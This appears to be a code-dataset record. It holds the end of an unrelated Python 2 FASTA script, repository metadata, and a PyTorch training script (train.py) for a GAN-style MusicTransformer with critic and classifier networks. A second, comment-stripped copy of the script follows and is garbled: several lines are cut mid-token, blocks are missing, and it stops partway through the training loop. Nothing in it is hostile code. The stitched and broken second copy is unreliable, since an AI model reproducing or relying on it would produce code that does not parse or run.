if hash[group].has_key(id): sys.stderr.write("WARNING: overwriting entry with the same ID (%s) in group %s...\n" %(id, group))
hash[group][id] = seq
return hash
hash = {}
for name, regex in groups.iteritems(): hash[name] = {}
if hash.has_key('*all*'): sys.stderr.write("WARNING: you used \"*all*\" as a group name. This name refers to all non-group-matching entries as well!\n")
hash['*all*'] = {}
id, seq = "", ""
fo = open( file )
for line in fo:
line = line.rstrip()
if line.startswith(">"):
if id != "": add_entry( hash, groups, id, seq )
id = line[1:]
seq = ""
else:
seq += line
if id != "": add_entry( hash, groups, id, seq )
fo.close()
return hash
def eval_seq_lengths(hash):
for group, seqhash in hash.iteritems():
for id, seq in seqhash.iteritems():
print string.join([group, id, str(len(seq))], "\t")
def main( args ):
groups = {}
if args.has_key('group'): groups = read_groups( args.get('group') )
seqhash = read_sequences( args.get('file'), groups )
eval_seq_lengths(seqhash)
args = handle_arguments()
main( args )
| false
| true
|
790dc821dd259e60fc21fabc45da87128247863e
| 21,528
|
py
|
Python
|
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
import os
import csv
import shutil
from datetime import datetime
from numpy import logspace
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.utils.data import DataLoader
from torch.optim import Adam
from dataset.e_piano import create_epiano_datasets, create_pop909_datasets
from model.music_transformer import MusicTransformer
from model.discriminator import MusicDiscriminator
from model.classifier import CNNDiscriminator
from model.loss import SmoothCrossEntropyLoss
from utilities.constants import *
from utilities.WGAN_GP import WassersteinLoss
from utilities.device import get_device, use_cuda
from utilities.lr_scheduling import LrStepTracker, get_lr
from utilities.argument_funcs import parse_train_args, print_train_args, write_model_params
from utilities.run_model import train_epoch, eval_model
CSV_HEADER = ["Epoch", "Learn rate", "Avg Train loss", "Train Accuracy", "Avg Eval loss", "Eval accuracy"]
dis_filter_sizes = [2, 3, 4, 5]
dis_num_filters = [300, 300, 300, 300]
# Baseline is an untrained epoch that we evaluate as a baseline loss and accuracy
BASELINE_EPOCH = -1
# main
def main():
"""
----------
Author: Damon Gwinn
----------
Entry point. Trains a model specified by command line arguments
----------
"""
args = parse_train_args()
print_train_args(args)
if(args.force_cpu):
use_cuda(False)
print("WARNING: Forced CPU usage, expect model to perform slower")
print("")
eventid = f"{datetime.now().strftime('MusicTransformer-%Y.%m.%d')}_gan_{args.gan}_creative_{args.creative}_ce_{args.ce_smoothing}"
args.output_dir = args.output_dir + "/" + eventid
os.makedirs(args.output_dir, exist_ok=True)
##### Output prep #####
params_file = os.path.join(args.output_dir, "model_params.txt")
write_model_params(args, params_file)
weights_folder = os.path.join(args.output_dir, "weights")
os.makedirs(weights_folder, exist_ok=True)
results_folder = os.path.join(args.output_dir, "results")
os.makedirs(results_folder, exist_ok=True)
results_file = os.path.join(results_folder, "results.csv")
best_loss_file = os.path.join(results_folder, "best_loss_weights.pickle")
best_acc_file = os.path.join(results_folder, "best_acc_weights.pickle")
best_loss_critic_file = os.path.join(results_folder, "best_loss_critic_weights.pickle")
best_acc_critic_file = os.path.join(results_folder, "best_acc_critic_weights.pickle")
best_loss_classifier_file = os.path.join(
results_folder, "best_loss_classifier_weights.pickle")
best_acc_classifier_file = os.path.join(
results_folder, "best_acc_classifier_weights.pickle")
best_text = os.path.join(results_folder, "best_epochs.txt")
##### Tensorboard #####
if(args.no_tensorboard):
tensorboard_summary = None
else:
from torch.utils.tensorboard import SummaryWriter
tensorboad_dir = os.path.join(args.output_dir, "tensorboard/" + eventid)
tensorboard_summary = SummaryWriter(log_dir=tensorboad_dir)
##### Datasets #####
# 데이터셋이 바뀌기 때문에 아래와같이 해주어야함
if args.interval and args.octave:
print("octave interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_interval_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding and args.absolute:
print("absolute dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_absolute_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/pop909_absolute', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.interval and not args.octave:
print("interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding:
print("Octave_fusion dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif not args.interval and args.octave and not args.fusion_encoding:
print("Octave dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/pop909_octave', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.logscale:
print("logscvale dataset")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_epiano0420', args.max_sequence, random_seq=True,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop0420', args.max_sequence, random_seq=True, condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
else:
classic_train, classic_val, classic_test = create_epiano_datasets(args.classic_input_dir, args.max_sequence,
condition_token = args.condition_token, octave = args.octave)
pop909_dataset = create_pop909_datasets('dataset/pop_pickle/', args.max_sequence, condition_token = args.condition_token, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1), len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
if args.data == 'both':
print("Dataset: both")
train_dataset = torch.utils.data.ConcatDataset([ classic_train, pop_train])
val_dataset = torch.utils.data.ConcatDataset([ classic_val, pop_valid])
elif args.data == 'classic':
print("Dataset: classic")
train_dataset = torch.utils.data.ConcatDataset([classic_train])
val_dataset = torch.utils.data.ConcatDataset([classic_val])
else:
print("Dataset: pop")
train_dataset = torch.utils.data.ConcatDataset([pop_train])
val_dataset = torch.utils.data.ConcatDataset([pop_valid])
test_dataset = torch.utils.data.ConcatDataset([classic_test, pop_test])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.n_workers, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
model = MusicTransformer(n_layers=args.n_layers, num_heads=args.num_heads,
d_model=args.d_model, dim_feedforward=args.dim_feedforward, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr,
condition_token = args.condition_token, interval = args.interval, octave = args.octave,
fusion = args.fusion_encoding, absolute = args.absolute, logscale=args.logscale).to(get_device())
# EY critic
# num_prime = args.num_prime
critic = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
classifier = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
if args.creative:
classifier.load_state_dict(torch.load('best_classifier_acc_0.9883.pickle'))
##### Continuing from previous training session #####
start_epoch = BASELINE_EPOCH
if(args.continue_weights is not None):
if(args.continue_epoch is None):
print("ERROR: Need epoch number to continue from (-continue_epoch) when using continue_weights")
return
else:
model.load_state_dict(torch.load(args.continue_weights))
start_epoch = args.continue_epoch
elif(args.continue_epoch is not None):
print("ERROR: Need continue weights (-continue_weights) when using continue_epoch")
return
##### Lr Scheduler vs static lr #####
if(args.lr is None):
if(args.continue_epoch is None):
init_step = 0
else:
init_step = args.continue_epoch * len(train_loader)
lr = LR_DEFAULT_START
lr_stepper = LrStepTracker(args.d_model, SCHEDULER_WARMUP_STEPS, init_step)
else:
lr = args.lr
##### Not smoothing evaluation loss #####
if args.interval and args.octave:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_INTERVAL)
elif args.interval and not args.octave:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_INTERVAL)
elif args.octave and args.fusion_encoding and args.absolute:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif args.octave and args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_RELATIVE)
else:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD)
##### SmoothCrossEntropyLoss or CrossEntropyLoss for training #####
if(args.ce_smoothing is None):
train_loss_func = eval_loss_func
else:
if args.interval and args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif args.interval and not args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif not args.interval and args.octave and args.fusion_encoding and args.absolute:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION_ABSOLUTE, ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif not args.interval and args.octave and args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION, ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE, ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_RELATIVE, ignore_index=TOKEN_PAD_RELATIVE)
else:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE, ignore_index=TOKEN_PAD)
##### EY - WGAN Loss #####
classifier_loss_func = nn.MSELoss()
##### Optimizer #####
opt = Adam(model.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
critic_opt = Adam(critic.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
classifier_opt = Adam(classifier.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
if(args.lr is None):
lr_scheduler = LambdaLR(opt, lr_stepper.step)
critic_lr_scheduler = LambdaLR(critic_opt, lr_stepper.step)
classifier_lr_scheduler = LambdaLR(classifier_opt, lr_stepper.step)
else:
lr_scheduler = None
##### Tracking best evaluation accuracy #####
best_eval_acc = 0.0
best_eval_acc_epoch = -1
best_eval_loss = float("inf")
best_eval_loss_epoch = -1
##### Results reporting #####
if(not os.path.isfile(results_file)):
with open(results_file, "w", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow(CSV_HEADER)
##### TRAIN LOOP #####
for epoch in range(start_epoch, args.epochs):
# Baseline has no training and acts as a base loss and accuracy (epoch 0 in a sense)
if(epoch >= BASELINE_EPOCH):
print(SEPERATOR)
print("NEW EPOCH:", epoch+1)
print(SEPERATOR)
print("")
# Train
# EY 고쳐야 할 부분의 시작
train_loss, train_acc, dis_loss, gen_loss, cre_loss, gan_accuracy, class_accuracy, creativity = train_epoch(epoch+1, model, critic, classifier, train_loader, train_loss_func, classifier_loss_func, opt, critic_opt, classifier_opt, lr_scheduler, critic_lr_scheduler, classifier_lr_scheduler, args)
print(SEPERATOR)
print("Evaluating:")
else:
print(SEPERATOR)
print("Baseline model evaluation (Epoch 0):")
# Eval
# train_loss, train_acc = eval_model(model, train_loader, train_loss_func)
eval_loss, eval_acc = eval_model(model, val_loader, eval_loss_func, args)
# Learn rate
lr = get_lr(opt)
print("Epoch:", epoch+1)
print("Avg train loss:", train_loss)
print("Avg train acc:", train_acc)
print("Avg eval loss:", eval_loss)
print("Avg eval acc:", eval_acc)
print(SEPERATOR)
print("")
new_best = False
if(eval_acc > best_eval_acc):
best_eval_acc = eval_acc
best_eval_acc_epoch = epoch+1
torch.save(model.state_dict(), best_acc_file)
torch.save(critic.state_dict(), best_acc_critic_file)
torch.save(classifier.state_dict(), best_acc_classifier_file)
new_best = True
if(eval_loss < best_eval_loss):
best_eval_loss = eval_loss
best_eval_loss_epoch = epoch+1
torch.save(model.state_dict(), best_loss_file)
torch.save(critic.state_dict(), best_loss_critic_file)
torch.save(classifier.state_dict(), best_loss_classifier_file)
new_best = True
# Writing out new bests
if(new_best):
with open(best_text, "w") as o_stream:
print("Best eval acc epoch:", best_eval_acc_epoch, file=o_stream)
print("Best eval acc:", best_eval_acc, file=o_stream)
print("")
print("Best eval loss epoch:", best_eval_loss_epoch, file=o_stream)
print("Best eval loss:", best_eval_loss, file=o_stream)
if(not args.no_tensorboard):
tensorboard_summary.add_scalar("Avg_CE_loss/train", train_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Avg_CE_loss/eval", eval_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/train", train_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/eval", eval_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Learn_rate/train", lr, global_step=epoch+1)
tensorboard_summary.add_scalar("Critic_loss/train", dis_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Gen_loss/train", gen_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity_loss/train", cre_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("GAN_accuracy/train", gan_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Class_accuracy/train", class_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity/train", creativity, global_step=epoch+1)
tensorboard_summary.flush()
if((epoch+1) % args.weight_modulus == 0):
epoch_str = str(epoch+1).zfill(PREPEND_ZEROS_WIDTH)
path = os.path.join(weights_folder, "epoch_" + epoch_str + ".pickle")
torch.save(model.state_dict(), path)
with open(results_file, "a", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow([epoch+1, lr, train_loss, train_acc, eval_loss, eval_acc])
# Sanity check just to make sure everything is gone
if(not args.no_tensorboard):
tensorboard_summary.flush()
return
if __name__ == "__main__":
main()
| 56.356021
| 307
| 0.645113
|
import os
import csv
import shutil
from datetime import datetime
from numpy import logspace
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.utils.data import DataLoader
from torch.optim import Adam
from dataset.e_piano import create_epiano_datasets, create_pop909_datasets
from model.music_transformer import MusicTransformer
from model.discriminator import MusicDiscriminator
from model.classifier import CNNDiscriminator
from model.loss import SmoothCrossEntropyLoss
from utilities.constants import *
from utilities.WGAN_GP import WassersteinLoss
from utilities.device import get_device, use_cuda
from utilities.lr_scheduling import LrStepTracker, get_lr
from utilities.argument_funcs import parse_train_args, print_train_args, write_model_params
from utilities.run_model import train_epoch, eval_model
CSV_HEADER = ["Epoch", "Learn rate", "Avg Train loss", "Train Accuracy", "Avg Eval loss", "Eval accuracy"]
dis_filter_sizes = [2, 3, 4, 5]
dis_num_filters = [300, 300, 300, 300]
BASELINE_EPOCH = -1
def main():
args = parse_train_args()
print_train_args(args)
if(args.force_cpu):
use_cuda(False)
print("WARNING: Forced CPU usage, expect model to perform slower")
print("")
eventid = f"{datetime.now().strftime('MusicTransformer-%Y.%m.%d')}_gan_{args.gan}_creative_{args.creative}_ce_{args.ce_smoothing}"
args.output_dir = args.output_dir + "/" + eventid
os.makedirs(args.output_dir, exist_ok=True)
params_file)
weights_folder = os.path.join(args.output_dir, "weights")
os.makedirs(weights_folder, exist_ok=True)
results_folder = os.path.join(args.output_dir, "results")
os.makedirs(results_folder, exist_ok=True)
results_file = os.path.join(results_folder, "results.csv")
best_loss_file = os.path.join(results_folder, "best_loss_weights.pickle")
best_acc_file = os.path.join(results_folder, "best_acc_weights.pickle")
best_loss_critic_file = os.path.join(results_folder, "best_loss_critic_weights.pickle")
best_acc_critic_file = os.path.join(results_folder, "best_acc_critic_weights.pickle")
best_loss_classifier_file = os.path.join(
results_folder, "best_loss_classifier_weights.pickle")
best_acc_classifier_file = os.path.join(
results_folder, "best_acc_classifier_weights.pickle")
best_text = os.path.join(results_folder, "best_epochs.txt")
ls.tensorboard import SummaryWriter
tensorboad_dir = os.path.join(args.output_dir, "tensorboard/" + eventid)
tensorboard_summary = SummaryWriter(log_dir=tensorboad_dir)
)
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_interval_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding and args.absolute:
print("absolute dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_absolute_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/pop909_absolute', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.interval and not args.octave:
print("interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding:
print("Octave_fusion dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif not args.interval and args.octave and not args.fusion_encoding:
print("Octave dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/pop909_octave', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.logscale:
print("logscvale dataset")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_epiano0420', args.max_sequence, random_seq=True,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop0420', args.max_sequence, random_seq=True, condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
else:
classic_train, classic_val, classic_test = create_epiano_datasets(args.classic_input_dir, args.max_sequence,
condition_token = args.condition_token, octave = args.octave)
pop909_dataset = create_pop909_datasets('dataset/pop_pickle/', args.max_sequence, condition_token = args.condition_token, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1), len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
if args.data == 'both':
print("Dataset: both")
train_dataset = torch.utils.data.ConcatDataset([ classic_train, pop_train])
val_dataset = torch.utils.data.ConcatDataset([ classic_val, pop_valid])
elif args.data == 'classic':
print("Dataset: classic")
train_dataset = torch.utils.data.ConcatDataset([classic_train])
val_dataset = torch.utils.data.ConcatDataset([classic_val])
else:
print("Dataset: pop")
train_dataset = torch.utils.data.ConcatDataset([pop_train])
val_dataset = torch.utils.data.ConcatDataset([pop_valid])
test_dataset = torch.utils.data.ConcatDataset([classic_test, pop_test])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.n_workers, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
model = MusicTransformer(n_layers=args.n_layers, num_heads=args.num_heads,
d_model=args.d_model, dim_feedforward=args.dim_feedforward, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr,
condition_token = args.condition_token, interval = args.interval, octave = args.octave,
fusion = args.fusion_encoding, absolute = args.absolute, logscale=args.logscale).to(get_device())
critic = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
classifier = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
if args.creative:
classifier.load_state_dict(torch.load('best_classifier_acc_0.9883.pickle'))
weights")
return
else:
model.load_state_dict(torch.load(args.continue_weights))
start_epoch = args.continue_epoch
elif(args.continue_epoch is not None):
print("ERROR: Need continue weights (-continue_weights) when using continue_epoch")
return
len(train_loader)
lr = LR_DEFAULT_START
lr_stepper = LrStepTracker(args.d_model, SCHEDULER_WARMUP_STEPS, init_step)
else:
lr = args.lr
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_INTERVAL)
elif args.octave and args.fusion_encoding and args.absolute:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif args.octave and args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_RELATIVE)
else:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD)
f args.interval and not args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif not args.interval and args.octave and args.fusion_encoding and args.absolute:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION_ABSOLUTE, ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif not args.interval and args.octave and args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION, ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE, ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_RELATIVE, ignore_index=TOKEN_PAD_RELATIVE)
else:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE, ignore_index=TOKEN_PAD)
ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
classifier_opt = Adam(classifier.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
if(args.lr is None):
lr_scheduler = LambdaLR(opt, lr_stepper.step)
critic_lr_scheduler = LambdaLR(critic_opt, lr_stepper.step)
classifier_lr_scheduler = LambdaLR(classifier_opt, lr_stepper.step)
else:
lr_scheduler = None
terow(CSV_HEADER)
H):
print(SEPERATOR)
print("NEW EPOCH:", epoch+1)
print(SEPERATOR)
print("")
train_loss, train_acc, dis_loss, gen_loss, cre_loss, gan_accuracy, class_accuracy, creativity = train_epoch(epoch+1, model, critic, classifier, train_loader, train_loss_func, classifier_loss_func, opt, critic_opt, classifier_opt, lr_scheduler, critic_lr_scheduler, classifier_lr_scheduler, args)
print(SEPERATOR)
print("Evaluating:")
else:
print(SEPERATOR)
print("Baseline model evaluation (Epoch 0):")
eval_loss, eval_acc = eval_model(model, val_loader, eval_loss_func, args)
lr = get_lr(opt)
print("Epoch:", epoch+1)
print("Avg train loss:", train_loss)
print("Avg train acc:", train_acc)
print("Avg eval loss:", eval_loss)
print("Avg eval acc:", eval_acc)
print(SEPERATOR)
print("")
new_best = False
if(eval_acc > best_eval_acc):
best_eval_acc = eval_acc
